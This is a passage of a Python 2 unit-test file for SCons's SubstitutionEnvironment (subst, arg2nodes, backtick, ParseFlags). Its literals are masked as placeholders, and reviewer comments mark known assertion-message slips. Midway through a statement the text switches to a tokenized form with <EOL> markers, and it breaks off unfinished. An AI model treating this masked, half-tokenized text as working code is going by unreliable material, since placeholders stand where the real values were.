    def __init__(self, seq):
        if type(seq) == type('<STR_LIT>'):
            seq = string.split(seq)
        UserList.UserList.__init__(self, seq)
    def __add__(self, other):
        return UserList.UserList.__add__(self, CLVar(other))
    def __radd__(self, other):
        return UserList.UserList.__radd__(self, CLVar(other))
    def __coerce__(self, other):
        return (self, CLVar(other))

class DummyNode:
    # Minimal Node stand-in with the interface arg2nodes/subst expect.
    def __init__(self, name):
        self.name = name
    def __str__(self):
        return self.name
    def rfile(self):
        return self
    def get_subst_proxy(self):
        return self

def test_tool(env):
    # Trivial tool function: marks the environment so tests can see it ran.
    env['<STR_LIT>'] = '<STR_LIT>'

class TestEnvironmentFixture:
    # Mixin providing a TestEnvironment() factory that fills in default tools,
    # default construction variables and a default static-object builder.
    def TestEnvironment(self, *args, **kw):
        if not kw or not kw.has_key('<STR_LIT>'):
            kw['<STR_LIT>'] = [test_tool]
        default_keys = {'<STR_LIT>': '<STR_LIT>',
                        '<STR_LIT>': '<STR_LIT>',
                        '<STR_LIT>': {'<STR_LIT>': '<STR_LIT>'}}
        for key, value in default_keys.items():
            if not kw.has_key(key):
                kw[key] = value
        if not kw.has_key('<STR_LIT>'):
            static_obj = SCons.Builder.Builder(action={},
                                               emitter={},
                                               suffix='<STR_LIT>',
                                               single_source=<NUM_LIT:1>)
            kw['<STR_LIT>'] = {'<STR_LIT>': static_obj}
            static_obj.add_action('<STR_LIT>', '<STR_LIT>')
        env = apply(Environment, args, kw)
        return env

class SubstitutionTestCase(unittest.TestCase):
    def test___init__(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment()
        assert not env.has_key('<STR_LIT>')
    def test___cmp__(self):
        """<STR_LIT>"""
        env1 = SubstitutionEnvironment(XXX='<STR_LIT:x>')
        env2 = SubstitutionEnvironment(XXX='<STR_LIT:x>')
        env3 = SubstitutionEnvironment(XXX='<STR_LIT>')
        env4 = SubstitutionEnvironment(XXX='<STR_LIT:x>', YYY='<STR_LIT:x>')
        assert env1 == env2
        assert env1 != env3
        assert env1 != env4
    def test___delitem__(self):
        """<STR_LIT>"""
        env1 = SubstitutionEnvironment(XXX='<STR_LIT:x>', YYY='<STR_LIT:y>')
        env2 = SubstitutionEnvironment(XXX='<STR_LIT:x>')
        del env1['<STR_LIT>']
        assert env1 == env2
    def test___getitem__(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment(XXX='<STR_LIT:x>')
        assert env['<STR_LIT>'] == '<STR_LIT:x>', env['<STR_LIT>']
    def test___setitem__(self):
        """<STR_LIT>"""
        env1 = SubstitutionEnvironment(XXX='<STR_LIT:x>')
        env2 = SubstitutionEnvironment(XXX='<STR_LIT:x>', YYY='<STR_LIT:y>')
        env1['<STR_LIT>'] = '<STR_LIT:y>'
        assert env1 == env2
    def test_get(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment(XXX='<STR_LIT:x>')
        assert env.get('<STR_LIT>') == '<STR_LIT:x>', env.get('<STR_LIT>')
        assert env.get('<STR_LIT>') is None, env.get('<STR_LIT>')
    def test_has_key(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment(XXX='<STR_LIT:x>')
        assert env.has_key('<STR_LIT>')
        assert not env.has_key('<STR_LIT>')
    def test_contains(self):
        """<STR_LIT>"""
        # Only exercise 'in' when this Python supports it on dicts; on very old
        # versions the probe raises TypeError and the test is skipped.
        try:
            '<STR_LIT:x>' in {'<STR_LIT:x>': <NUM_LIT:1>}
        except TypeError:
            pass
        else:
            env = SubstitutionEnvironment(XXX='<STR_LIT:x>')
            assert '<STR_LIT>' in env
            assert not '<STR_LIT>' in env
    def test_items(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment(XXX='<STR_LIT:x>', YYY='<STR_LIT:y>')
        items = env.items()
        assert items == [('<STR_LIT>', '<STR_LIT:x>'), ('<STR_LIT>', '<STR_LIT:y>')], items
    def test_arg2nodes(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment()
        # Shadows the builtin 'dict' — preserved from the original; acts as a
        # memo for the node Factory below.
        dict = {}
        class X(SCons.Node.Node):
            pass
        def Factory(name, directory=None, create=<NUM_LIT:1>, dict=dict, X=X):
            if not dict.has_key(name):
                dict[name] = X()
                dict[name].name = name
            return dict[name]
        nodes = env.arg2nodes("<STR_LIT>", Factory)
        assert len(nodes) == <NUM_LIT:1>, nodes
        assert isinstance(nodes[<NUM_LIT:0>], X)
        assert nodes[<NUM_LIT:0>].name == "<STR_LIT>"
        import types
        if hasattr(types, '<STR_LIT>'):
            # Conditionally exec extra (masked) source, presumably unicode-only
            # cases — TODO confirm against the unmasked file.
            code = """<STR_LIT>"""
            exec code in globals(), locals()
        nodes = env.arg2nodes(["<STR_LIT>", "<STR_LIT>"], Factory)
        assert len(nodes) == <NUM_LIT:2>, nodes
        assert isinstance(nodes[<NUM_LIT:0>], X)
        assert isinstance(nodes[<NUM_LIT:1>], X)
        assert nodes[<NUM_LIT:0>].name == "<STR_LIT>"
        assert nodes[<NUM_LIT:1>].name == "<STR_LIT>"
        n1 = Factory("<STR_LIT>")
        nodes = env.arg2nodes([n1, "<STR_LIT>"], Factory)
        assert len(nodes) == <NUM_LIT:2>, nodes
        assert isinstance(nodes[<NUM_LIT:0>], X)
        assert isinstance(nodes[<NUM_LIT:1>], X)
        assert nodes[<NUM_LIT:0>].name == "<STR_LIT>"
        assert nodes[<NUM_LIT:1>].name == "<STR_LIT>"
        class SConsNode(SCons.Node.Node):
            pass
        nodes = env.arg2nodes(SConsNode())
        assert len(nodes) == <NUM_LIT:1>, nodes
        # BUG(review): assertion message uses undefined name 'node' (NameError on
        # failure); should be 'nodes'. Preserved byte-identically here.
        assert isinstance(nodes[<NUM_LIT:0>], SConsNode), node
        class OtherNode:
            pass
        nodes = env.arg2nodes(OtherNode())
        assert len(nodes) == <NUM_LIT:1>, nodes
        # BUG(review): same undefined 'node' message as above.
        assert isinstance(nodes[<NUM_LIT:0>], OtherNode), node
        def lookup_a(str, F=Factory):
            # Note: parameter shadows the builtin 'str' (preserved).
            if str[<NUM_LIT:0>] == '<STR_LIT:a>':
                n = F(str)
                n.a = <NUM_LIT:1>
                return n
            else:
                return None
        def lookup_b(str, F=Factory):
            if str[<NUM_LIT:0>] == '<STR_LIT:b>':
                n = F(str)
                n.b = <NUM_LIT:1>
                return n
            else:
                return None
        env_ll = SubstitutionEnvironment()
        env_ll.lookup_list = [lookup_a, lookup_b]
        nodes = env_ll.arg2nodes(['<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], Factory)
        assert len(nodes) == <NUM_LIT:3>, nodes
        assert nodes[<NUM_LIT:0>].name == '<STR_LIT>', nodes[<NUM_LIT:0>]
        assert nodes[<NUM_LIT:0>].a == <NUM_LIT:1>, nodes[<NUM_LIT:0>]
        assert not hasattr(nodes[<NUM_LIT:0>], '<STR_LIT:b>'), nodes[<NUM_LIT:0>]
        assert nodes[<NUM_LIT:1>].name == '<STR_LIT>'
        assert not hasattr(nodes[<NUM_LIT:1>], '<STR_LIT:a>'), nodes[<NUM_LIT:1>]
        assert nodes[<NUM_LIT:1>].b == <NUM_LIT:1>, nodes[<NUM_LIT:1>]
        assert nodes[<NUM_LIT:2>].name == '<STR_LIT>'
        # NOTE(review): the next two assertion messages reference nodes[1] while
        # testing nodes[2] — copy/paste slip in the failure message only.
        assert not hasattr(nodes[<NUM_LIT:2>], '<STR_LIT:a>'), nodes[<NUM_LIT:1>]
        assert not hasattr(nodes[<NUM_LIT:2>], '<STR_LIT:b>'), nodes[<NUM_LIT:1>]
        def lookup_bbbb(str, F=Factory):
            if str == '<STR_LIT>':
                n = F(str)
                n.bbbb = <NUM_LIT:1>
                return n
            else:
                return None
        def lookup_c(str, F=Factory):
            if str[<NUM_LIT:0>] == '<STR_LIT:c>':
                n = F(str)
                n.c = <NUM_LIT:1>
                return n
            else:
                return None
        nodes = env.arg2nodes(['<STR_LIT>', '<STR_LIT>'], Factory,
                              [lookup_c, lookup_bbbb, lookup_b])
        assert len(nodes) == <NUM_LIT:2>, nodes
        assert nodes[<NUM_LIT:0>].name == '<STR_LIT>'
        # NOTE(review): several of the following failure messages index the wrong
        # node (nodes[1]/nodes[0] swapped) — message-only slips, preserved as-is.
        assert not hasattr(nodes[<NUM_LIT:0>], '<STR_LIT:a>'), nodes[<NUM_LIT:1>]
        assert not hasattr(nodes[<NUM_LIT:0>], '<STR_LIT:b>'), nodes[<NUM_LIT:1>]
        assert nodes[<NUM_LIT:0>].bbbb == <NUM_LIT:1>, nodes[<NUM_LIT:1>]
        assert not hasattr(nodes[<NUM_LIT:0>], '<STR_LIT:c>'), nodes[<NUM_LIT:0>]
        assert nodes[<NUM_LIT:1>].name == '<STR_LIT>'
        assert not hasattr(nodes[<NUM_LIT:1>], '<STR_LIT:a>'), nodes[<NUM_LIT:1>]
        assert not hasattr(nodes[<NUM_LIT:1>], '<STR_LIT:b>'), nodes[<NUM_LIT:1>]
        assert not hasattr(nodes[<NUM_LIT:1>], '<STR_LIT>'), nodes[<NUM_LIT:0>]
        assert nodes[<NUM_LIT:1>].c == <NUM_LIT:1>, nodes[<NUM_LIT:1>]
    def test_arg2nodes_target_source(self):
        """<STR_LIT>"""
        targets = [DummyNode('<STR_LIT>'), DummyNode('<STR_LIT>')]
        sources = [DummyNode('<STR_LIT>'), DummyNode('<STR_LIT>')]
        env = SubstitutionEnvironment()
        nodes = env.arg2nodes(['<STR_LIT>',
                               '<STR_LIT>',
                               '<STR_LIT>',
                               '<STR_LIT>'],
                              DummyNode,
                              target=targets,
                              source=sources)
        names = map(lambda n: n.name, nodes)
        assert names == ['<STR_LIT>', '<STR_LIT>', '<STR_LIT>', '<STR_LIT>'], names
    def test_gvars(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment()
        gvars = env.gvars()
        assert gvars == {}, gvars
    def test_lvars(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment()
        lvars = env.lvars()
        assert lvars == {}, lvars
    def test_subst(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment(AAA='<STR_LIT:a>', BBB='<STR_LIT:b>')
        mystr = env.subst("<STR_LIT>")
        assert mystr == "<STR_LIT>", mystr
        env = SubstitutionEnvironment(AAA='<STR_LIT>', BBB='<STR_LIT:b>', BBBA='<STR_LIT:foo>')
        mystr = env.subst("<STR_LIT>")
        assert mystr == "<STR_LIT>", mystr
        env = SubstitutionEnvironment(AAA='<STR_LIT>', BBB='<STR_LIT>', CCC='<STR_LIT:c>')
        mystr = env.subst("<STR_LIT>")
        assert mystr == "<STR_LIT>", mystr
        env = SubstitutionEnvironment(AAA=['<STR_LIT:a>', '<STR_LIT>', '<STR_LIT>'])
        mystr = env.subst("<STR_LIT>")
        assert mystr == "<STR_LIT>", mystr
        env = SubstitutionEnvironment(AAA=('<STR_LIT:a>', '<STR_LIT>', '<STR_LIT>'))
        mystr = env.subst("<STR_LIT>")
        assert mystr == "<STR_LIT>", mystr
        t1 = DummyNode('<STR_LIT>')
        t2 = DummyNode('<STR_LIT>')
        s1 = DummyNode('<STR_LIT>')
        s2 = DummyNode('<STR_LIT>')
        env = SubstitutionEnvironment(AAA='<STR_LIT>')
        s = env.subst('<STR_LIT>', target=[t1, t2], source=[s1, s2])
        assert s == "<STR_LIT>", s
        s = env.subst('<STR_LIT>', target=[t1, t2], source=[s1, s2])
        assert s == "<STR_LIT>", s
        def foo(target, source, env, for_signature):
            # Callable construction variable: verifies target/source it is given.
            assert str(target) == '<STR_LIT:t>', target
            assert str(source) == '<STR_LIT:s>', source
            return env["<STR_LIT>"]
        env = SubstitutionEnvironment(BAR=foo, FOO='<STR_LIT>')
        t = DummyNode('<STR_LIT:t>')
        s = DummyNode('<STR_LIT:s>')
        subst = env.subst('<STR_LIT>', target=t, source=s)
        assert subst == '<STR_LIT>', subst
        # Disabled block (if 0:) — dead code kept from the original file.
        if <NUM_LIT:0>:
            def bar(arg):
                pass
            env = SubstitutionEnvironment(BAR=bar, FOO='<STR_LIT>')
            subst = env.subst('<STR_LIT>', call=None)
            assert subst is bar, subst
            subst = env.subst('<STR_LIT>', call=None)
            assert subst is bar, subst
    def test_subst_kw(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment(AAA='<STR_LIT:a>', BBB='<STR_LIT:b>')
        kw = env.subst_kw({'<STR_LIT>': '<STR_LIT>', '<STR_LIT>': '<STR_LIT>'})
        assert len(kw) == <NUM_LIT:2>, kw
        assert kw['<STR_LIT:a>'] == '<STR_LIT>', kw['<STR_LIT:a>']
        assert kw['<STR_LIT>'] == '<STR_LIT:b>', kw['<STR_LIT>']
    def test_subst_list(self):
        """<STR_LIT>"""
        env = SubstitutionEnvironment(AAA='<STR_LIT:a>', BBB='<STR_LIT:b>')
        l = env.subst_list("<STR_LIT>")
        assert l == [["<STR_LIT:a>", "<STR_LIT>", "<STR_LIT:b>"]], l
        env = SubstitutionEnvironment(AAA='<STR_LIT>', BBB='<STR_LIT:b>', BBBA='<STR_LIT:foo>')
        l = env.subst_list("<STR_LIT>")
        assert l == [["<STR_LIT:b>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:b>"]], l
        env = SubstitutionEnvironment(AAA='<STR_LIT>', BBB='<STR_LIT>', CCC='<STR_LIT:c>')
        l = env.subst_list("<STR_LIT>")
        # BUG(review): failure message uses 'mystr' (a name from test_subst, not
        # defined in this method) instead of 'l' — NameError on failure.
        assert l == [["<STR_LIT:c>", "<STR_LIT>", "<STR_LIT>", "<STR_LIT:c>"]], mystr
        env = SubstitutionEnvironment(AAA='<STR_LIT>', BBB='<STR_LIT>', CCC=['<STR_LIT:a>', '<STR_LIT>'])
        # Method continues past the end of this chunk (statement cut off below).
        lst = env.
subst_list ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert lst == [ [ "<STR_LIT:a>" , "<STR_LIT:b>" ] , [ "<STR_LIT:c>" , "<STR_LIT>" , "<STR_LIT:b>" ] , [ "<STR_LIT:c>" ] ] , lst <EOL> t1 = DummyNode ( '<STR_LIT>' ) <EOL> t2 = DummyNode ( '<STR_LIT>' ) <EOL> s1 = DummyNode ( '<STR_LIT>' ) <EOL> s2 = DummyNode ( '<STR_LIT>' ) <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT>' ) <EOL> s = env . subst_list ( '<STR_LIT>' , target = [ t1 , t2 ] , source = [ s1 , s2 ] ) <EOL> assert s == [ [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] , s <EOL> s = env . subst_list ( '<STR_LIT>' , target = [ t1 , t2 ] , source = [ s1 , s2 ] ) <EOL> assert s == [ [ "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" , "<STR_LIT>" ] ] , s <EOL> def foo ( target , source , env , for_signature ) : <EOL> assert str ( target ) == '<STR_LIT:t>' , target <EOL> assert str ( source ) == '<STR_LIT:s>' , source <EOL> return env [ "<STR_LIT>" ] <EOL> env = SubstitutionEnvironment ( BAR = foo , FOO = '<STR_LIT>' ) <EOL> t = DummyNode ( '<STR_LIT:t>' ) <EOL> s = DummyNode ( '<STR_LIT:s>' ) <EOL> lst = env . subst_list ( '<STR_LIT>' , target = t , source = s ) <EOL> assert lst == [ [ '<STR_LIT:test>' , '<STR_LIT>' ] ] , lst <EOL> if <NUM_LIT:0> : <EOL> def bar ( arg ) : <EOL> pass <EOL> env = SubstitutionEnvironment ( BAR = bar , FOO = '<STR_LIT>' ) <EOL> subst = env . subst_list ( '<STR_LIT>' , call = None ) <EOL> assert subst is bar , subst <EOL> subst = env . subst_list ( '<STR_LIT>' , call = None ) <EOL> assert subst is bar , subst <EOL> def test_subst_path ( self ) : <EOL> """<STR_LIT>""" <EOL> class MyProxy : <EOL> def __init__ ( self , val ) : <EOL> self . val = val <EOL> def get ( self ) : <EOL> return self . val + '<STR_LIT>' <EOL> class MyNode : <EOL> def __init__ ( self , val ) : <EOL> self . val = val <EOL> def get_subst_proxy ( self ) : <EOL> return self <EOL> def __str__ ( self ) : <EOL> return self . 
val <EOL> class MyObj : <EOL> def get ( self ) : <EOL> return self <EOL> env = SubstitutionEnvironment ( FOO = '<STR_LIT:foo>' , <EOL> BAR = '<STR_LIT:bar>' , <EOL> LIST = [ '<STR_LIT>' , '<STR_LIT>' ] , <EOL> PROXY = MyProxy ( '<STR_LIT>' ) ) <EOL> r = env . subst_path ( '<STR_LIT>' ) <EOL> assert r == [ '<STR_LIT:foo>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert r == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert map ( str , r ) == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] ) <EOL> assert r == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , target = MyNode ( '<STR_LIT>' ) ) <EOL> assert map ( str , r ) == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> r = env . subst_path ( [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , source = MyNode ( '<STR_LIT>' ) ) <EOL> assert map ( str , r ) == [ '<STR_LIT:foo>' , '<STR_LIT>' , '<STR_LIT:bar>' ] , r <EOL> n = MyObj ( ) <EOL> r = env . subst_path ( [ '<STR_LIT>' , MyProxy ( '<STR_LIT>' ) , n ] ) <EOL> assert r == [ '<STR_LIT>' , '<STR_LIT>' , n ] , r <EOL> class StringableObj : <EOL> def __init__ ( self , s ) : <EOL> self . s = s <EOL> def __str__ ( self ) : <EOL> return self . s <EOL> env = SubstitutionEnvironment ( FOO = StringableObj ( "<STR_LIT:foo>" ) , <EOL> BAR = StringableObj ( "<STR_LIT:bar>" ) ) <EOL> r = env . subst_path ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert r == [ "<STR_LIT>" , "<STR_LIT>" ] , r <EOL> r = env . subst_path ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert r == [ "<STR_LIT>" , "<STR_LIT>" ] , r <EOL> r = env . 
subst_path ( [ "<STR_LIT>" , "<STR_LIT>" ] ) <EOL> assert r == [ "<STR_LIT>" , "<STR_LIT>" ] , r <EOL> def test_subst_target_source ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( AAA = '<STR_LIT:a>' , BBB = '<STR_LIT:b>' ) <EOL> mystr = env . subst_target_source ( "<STR_LIT>" ) <EOL> assert mystr == "<STR_LIT>" , mystr <EOL> def test_backtick ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> test = TestCmd . TestCmd ( workdir = '<STR_LIT>' ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> test . write ( '<STR_LIT>' , """<STR_LIT>""" ) <EOL> save_stderr = sys . stderr <EOL> python = '<STR_LIT:">' + sys . executable + '<STR_LIT:">' <EOL> try : <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> output = env . backtick ( cmd ) <EOL> errout = sys . stderr . getvalue ( ) <EOL> assert output == '<STR_LIT>' , output <EOL> assert errout == '<STR_LIT>' , errout <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> output = env . backtick ( cmd ) <EOL> errout = sys . stderr . getvalue ( ) <EOL> assert output == '<STR_LIT>' , output <EOL> assert errout == '<STR_LIT>' , errout <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> try : <EOL> env . backtick ( cmd ) <EOL> except OSError , e : <EOL> assert str ( e ) == "<STR_LIT>" % cmd , str ( e ) <EOL> else : <EOL> self . fail ( "<STR_LIT>" ) <EOL> sys . stderr = StringIO . StringIO ( ) <EOL> cmd = '<STR_LIT>' % ( python , test . workpath ( '<STR_LIT>' ) ) <EOL> env [ '<STR_LIT>' ] = os . environ . copy ( ) <EOL> env [ '<STR_LIT>' ] [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> output = env . backtick ( cmd ) <EOL> errout = sys . stderr . 
getvalue ( ) <EOL> assert output == '<STR_LIT>' , output <EOL> assert errout == '<STR_LIT>' , errout <EOL> finally : <EOL> sys . stderr = save_stderr <EOL> def test_AddMethod ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( FOO = '<STR_LIT:foo>' ) <EOL> def func ( self ) : <EOL> return '<STR_LIT>' + self [ '<STR_LIT>' ] <EOL> assert not hasattr ( env , '<STR_LIT>' ) <EOL> env . AddMethod ( func ) <EOL> r = env . func ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> assert not hasattr ( env , '<STR_LIT:bar>' ) <EOL> env . AddMethod ( func , '<STR_LIT:bar>' ) <EOL> r = env . bar ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> def func2 ( self , arg = '<STR_LIT>' ) : <EOL> return '<STR_LIT>' + self [ '<STR_LIT>' ] + arg <EOL> env . AddMethod ( func2 ) <EOL> r = env . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env . func2 ( '<STR_LIT>' ) <EOL> assert r == '<STR_LIT>' , r <EOL> env . AddMethod ( func2 , '<STR_LIT>' ) <EOL> r = env . func ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env . func ( '<STR_LIT>' ) <EOL> assert r == '<STR_LIT>' , r <EOL> env1 = Environment ( FOO = '<STR_LIT:1>' ) <EOL> env1 . AddMethod ( func2 ) <EOL> env2 = env1 . Clone ( FOO = '<STR_LIT:2>' ) <EOL> env3 = env2 . Clone ( FOO = '<STR_LIT:3>' ) <EOL> env4 = env3 . Clone ( FOO = '<STR_LIT:4>' ) <EOL> r = env1 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env2 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env3 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> r = env4 . func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> env1 = Environment ( FOO = '<STR_LIT:1>' ) <EOL> env1 . AddMethod ( func2 ) <EOL> def replace_func2 ( ) : <EOL> return '<STR_LIT>' <EOL> env1 . func2 = replace_func2 <EOL> env2 = env1 . Clone ( FOO = '<STR_LIT:2>' ) <EOL> r = env2 . 
func2 ( ) <EOL> assert r == '<STR_LIT>' , r <EOL> def test_Override ( self ) : <EOL> "<STR_LIT>" <EOL> env = SubstitutionEnvironment ( ONE = <NUM_LIT:1> , TWO = <NUM_LIT:2> , THREE = <NUM_LIT:3> , FOUR = <NUM_LIT:4> ) <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:2> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:3> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:4> , env [ '<STR_LIT>' ] <EOL> env2 = env . Override ( { '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : [ '<STR_LIT:x>' , '<STR_LIT>' , '<STR_LIT:y>' ] } ) <EOL> assert env2 [ '<STR_LIT>' ] == <NUM_LIT:1> , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == '<STR_LIT>' , env2 [ '<STR_LIT>' ] <EOL> assert env2 [ '<STR_LIT>' ] == [ '<STR_LIT:x>' , <NUM_LIT:4> , '<STR_LIT:y>' ] , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:2> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:3> , env [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:4> , env [ '<STR_LIT>' ] <EOL> env2 . Replace ( ONE = "<STR_LIT>" ) <EOL> assert env2 [ '<STR_LIT>' ] == "<STR_LIT>" , env2 [ '<STR_LIT>' ] <EOL> assert env [ '<STR_LIT>' ] == <NUM_LIT:1> , env [ '<STR_LIT>' ] <EOL> def test_ParseFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> empty = { <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> '<STR_LIT>' : [ ] , <EOL> } <EOL> d = env . ParseFlags ( None ) <EOL> assert d == empty , d <EOL> d = env . 
ParseFlags ( '<STR_LIT>' ) <EOL> assert d == empty , d <EOL> d = env . ParseFlags ( [ ] ) <EOL> assert d == empty , d <EOL> s = "<STR_LIT>" + '<STR_LIT>' + "<STR_LIT>" + '<STR_LIT>' + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" + "<STR_LIT>" <EOL> d = env . ParseFlags ( s ) <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , [ '<STR_LIT>' , '<STR_LIT:value>' ] , '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , <EOL> '<STR_LIT:bar>' , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , <EOL> '<STR_LIT:foo>' , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> LIBS = map ( str , d [ '<STR_LIT>' ] ) <EOL> assert LIBS == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , ( d [ '<STR_LIT>' ] , LIBS ) <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> assert d [ '<STR_LIT>' ] == [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , d [ '<STR_LIT>' ] <EOL> def test_MergeFlags ( self ) : <EOL> """<STR_LIT>""" <EOL> env = SubstitutionEnvironment ( ) <EOL> env . MergeFlags ( '<STR_LIT>' ) <EOL> assert not env . has_key ( '<STR_LIT>' ) , env [ '<STR_LIT>' ] <EOL> env . 
